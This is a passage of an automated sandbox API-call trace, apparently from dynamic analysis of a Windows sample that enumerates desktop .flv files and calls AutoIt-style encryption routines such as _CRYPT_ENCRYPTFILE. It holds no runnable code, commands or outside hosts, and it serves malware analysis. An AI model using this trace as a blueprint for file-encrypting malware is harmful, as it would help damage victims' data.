lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wDndAAy--Qv4hO-j v.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f95e030, ftCreationTime.dwHighDateTime=0x1d5dc57, ftLastAccessTime.dwLowDateTime=0x985b5670, ftLastAccessTime.dwHighDateTime=0x1d5de8f, ftLastWriteTime.dwLowDateTime=0x985b5670, ftLastWriteTime.dwHighDateTime=0x1d5de8f, nFileSizeHigh=0x0, nFileSizeLow=0x9f3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="wDndAAy--Qv4hO-j v.flv", cAlternateFileName="WDNDAA~1.FLV")) returned 0x90add8 [0168.171] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.171] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.171] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wDndAAy--Qv4hO-j v.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f95e030, ftCreationTime.dwHighDateTime=0x1d5dc57, ftLastAccessTime.dwLowDateTime=0x985b5670, ftLastAccessTime.dwHighDateTime=0x1d5de8f, ftLastWriteTime.dwLowDateTime=0x985b5670, ftLastWriteTime.dwHighDateTime=0x1d5de8f, nFileSizeHigh=0x0, nFileSizeLow=0x9f3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="wDndAAy--Qv4hO-j v.flv", cAlternateFileName="WDNDAA~1.FLV")) returned 0x90add8 [0168.171] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.171] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.171] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.171] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.171] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.171] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.171] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.171] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.171] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.172] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.172] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.173] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\we2ef3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.173] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.173] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.173] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.173] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.173] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.174] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.174] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.174] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.174] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.174] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.174] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.174] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.175] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x3c03b0, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 0x90add8 [0168.176] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.176] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.176] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x3c03b0, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 0x90add8 [0168.177] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.177] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wE2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E2eF3.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.178] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.178] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0168.178] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.178] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.180] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.180] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.180] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.180] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.180] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.180] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x3c03b0, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 0x90ae18 [0168.180] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.180] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.180] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.180] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.180] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.180] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.180] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.180] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0168.180] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.180] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.180] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0168.180] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.181] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.181] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.181] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.181] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.181] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0168.181] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.181] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0168.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.182] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0168.182] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.182] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.182] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.182] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0168.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.182] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.182] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.182] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.182] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.182] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.183] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.183] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.183] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.183] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.183] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, 